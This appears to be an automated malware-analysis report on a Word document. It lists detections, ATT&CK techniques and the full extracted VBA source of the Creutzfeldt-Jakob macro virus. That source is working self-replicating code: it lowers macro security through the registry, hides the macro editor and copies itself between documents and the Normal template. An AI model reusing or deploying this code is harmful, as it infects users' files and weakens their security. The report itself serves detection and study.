MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The file is a malicious Word document containing VBA macros, specifically a Document_Open macro. This macro attempts to lower macro security settings and disable the macro menu item, likely to facilitate further malicious activity. The ClamAV detection as 'Win.Trojan.Psycho-3' further supports its malicious nature. The script's actions suggest an attempt to establish persistence and evade detection.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3331 bytes |
SHA-256: 1d35d991604a85b94389b505c767aa763148f510643f29f5f3f243c3840da8c3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Creutzfeldt_Jakob"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Enabled = False
Normal_PathName = NormalTemplate.FullName
Attribs = GetAttr(Normal_PathName) And vbReadOnly
If Attribs = 1 Then
SetAttr Normal_PathName, vbArchive Or vbNormal
Else
CustomizationContext = NormalTemplate
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Clear
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
End If
Set xActual = ActiveDocument.VBProject.VBComponents.Item(1)
Set xNormal = NormalTemplate.VBProject.VBComponents.Item(1)
Code_Normal = xNormal.CodeModule.CountOfLines
Code_Actual = xActual.CodeModule.CountOfLines
If xNormal.Name <> "Creutzfeldt_Jakob" And Attribs <> 1 Then
xNormal.Name = "Creutzfeldt_Jakob"
Do While Code_Normal > 0
xNormal.CodeModule.DeleteLines 1
Code_Normal = Code_Normal - 1
Loop
Counter = 1
Do While xActual.CodeModule.Lines(Counter, 1) <> ""
xNormal.CodeModule.InsertLines Counter, xActual.CodeModule.Lines(Counter, 1)
Counter = Counter + 1
Loop
ElseIf xActual.Name <> "Creutzfeldt_Jakob" Then
xActual.Name = "Creutzfeldt_Jakob"
Do While Code_Actual > 0
xActual.CodeModule.DeleteLines 1
Code_Actual = Code_Actual - 1
Loop
Counter = 1
Do While xNormal.CodeModule.Lines(Counter, 1) <> ""
xActual.CodeModule.InsertLines Counter, xNormal.CodeModule.Lines(Counter, 1)
Counter = Counter + 1
Loop
End If
Randomize
PayDay = Int((31 - 1 + 1) * Rnd() + 1)
If PayDay = Day(Now) And ((Minute(Now) <= 15) Or (Minute(Now) >= 30 And Minute(Now) <= 45)) Then
Selection.Font.Name = "Courier"
Selection.Font.Size = 10
Selection.Font.Bold = True
Selection.Font.Color = wdColorAutomatic
Selection.TypeText " (__) (__) (__) (__) (__)"
Selection.TypeParagraph
Selection.TypeText " (@@) (@@) (@@) (@@) (@@)"
Selection.TypeParagraph
Selection.TypeText " /-------\/ /-------\/ /-------\/ /-------\/ /-------\/"
Selection.TypeParagraph
Selection.TypeText " / | || / | || / | || / | || / | ||"
Selection.TypeParagraph
Selection.TypeText " * ||----|| * ||----|| * ||----|| * ||----|| * ||----||"
Selection.TypeParagraph
Selection.TypeText " ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^"
Selection.TypeParagraph
Selection.Font.Color = wdColorBlue
Selection.TypeText "W2000M/Creutzfeldt-Jakob Macro Virus"
Selection.TypeParagraph
Selection.TypeText "(c)2001 by Tokugawa Ieyasu"
Selection.TypeParagraph
End If
If InStr(1, ActiveDocument.Name, "Document") = False Then
ActiveDocument.SaveAs ActiveDocument.FullName
Else
ActiveDocument.Saved = True
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.